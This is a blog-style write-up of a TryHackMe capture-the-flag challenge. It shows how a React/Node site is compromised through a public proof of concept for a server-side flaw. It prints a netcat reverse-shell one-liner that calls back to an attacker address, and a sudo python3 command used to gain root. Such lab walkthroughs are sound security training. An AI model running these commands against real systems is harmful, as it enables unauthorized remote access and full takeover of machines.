# TryHackMe Corp Website—Writeup

Welcome back to another writeup. This time, I’ll be going through how I solved the **Corp Website!** challenge from the THM Valentine’s event, **Love at First Breach 2026**. No excitement, no rush, just steps, logic, and silence. While the theme talks about love, this challenge felt more like tracing what was left behind: small mistakes, exposed surfaces, and things that were never meant to be seen. I’ll document the process from initial reconnaissance to the final compromise, focusing less on celebration and more on understanding how it all fell apart.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FXkqJzheX1ZwRj1f1y5By%2Fanimesher.com_sad-anime-girl-sad-gif-1997847.gif?alt=media&#x26;token=503c0b23-7bd0-4d8c-b2a7-17bb6ccd06ba" alt=""><figcaption></figcaption></figure>

Let's visit the site

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FcmCm8dhSBGIX5rsYZh5q%2FScreenshot%20(1279).png?alt=media&#x26;token=7e660cf9-a8c0-4ae3-828d-2f66c062ac86" alt=""><figcaption></figcaption></figure>

Huh, a sleek Valentine’s website. What’s the point? Places like this… ones full of feelings… have no space for someone as numb and broken as me.

As I dig into the site’s structure, I noticed `_next/` paths and React lazy-loaded components in the source. Looks like this app was built with **React** and **Node.js**.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FmHMhOAGi17ncowyWHmid%2FScreenshot%20(1277).png?alt=media&#x26;token=41efb2f8-f467-4577-9cc3-42dca7276de2" alt=""><figcaption></figcaption></figure>

At first, I thought this challenge might be vulnerable to **React2Shell**. If you remember, last year that vulnerability caused source code leaks and DoS issues—and it looks like this challenge is affected by the same flaw.

Next thing I did is to find an exploit for this in GitHub and I found this [PoC](https://github.com/liamromanis101/cve-2025-55182).&#x20;

So the next thing I did is to setup a reverse shell, this is the payload I've used

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.243 1234 >/tmp/f
```

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Flladw9XJrt53LMv34jg5%2FScreenshot%20(1291).png?alt=media&#x26;token=fc8f6295-2dd6-4ce2-986d-fc6dfde08da3" alt=""><figcaption></figcaption></figure>

And voila!

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FMEXA3oTl4VtRXEhjvW8o%2FScreenshot%20(1292).png?alt=media&#x26;token=17fc17dd-0294-4aba-a702-6d2fa332a946" alt=""><figcaption></figcaption></figure>

We have a shell!&#x20;

Now let's get the user flag:

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FE4XyFSO5NwCJvwe0OaAv%2FScreenshot%20(1295).png?alt=media&#x26;token=aa94b8ca-fa83-4f6b-ad42-e0ebc81499be" alt=""><figcaption></figcaption></figure>

Now the question is how to reach root. Next thing I did is to list the commands available with elevated privileges by running `sudo -l`.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FhQJgGg76TKbPIahstYfI%2FScreenshot%20(1296).png?alt=media&#x26;token=1af80399-a9b4-4f4e-aea4-45d7602c35d1" alt=""><figcaption></figcaption></figure>

Python3... That means we can leverage a `pty` to spawn a new shell and escalate our privileges to root.

```
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
```

And...

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FYDXvxIyWS1awCzJW70a1%2FScreenshot%20(1298).png?alt=media&#x26;token=b9dd50d2-264e-4026-8dd9-8a98e1d5c38f" alt=""><figcaption></figcaption></figure>

We've got the root and here's the root flag (redacted of course).

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FBv4ret2P8ltEn15jpgp9%2FScreenshot%20(1300).png?alt=media&#x26;token=3f9a067c-1e60-44d1-ac24-02ae8dedb45d" alt=""><figcaption></figcaption></figure>

And that’s where it ends. No fireworks, no celebration, just a root shell staring back at me. The challenge is solved, but nothing really changes. This writeup isn’t about winning or proving anything; it’s just a record of steps, mistakes, and quiet persistence. In a challenge wrapped in Valentine’s colors and soft words, the reality underneath was still the same: systems fail, trust breaks, and everything leaves a trace. Sometimes you don’t break in with force, you just follow what was already exposed. Close the terminal, take a breath, and move on. There’s always another machine waiting to fall apart.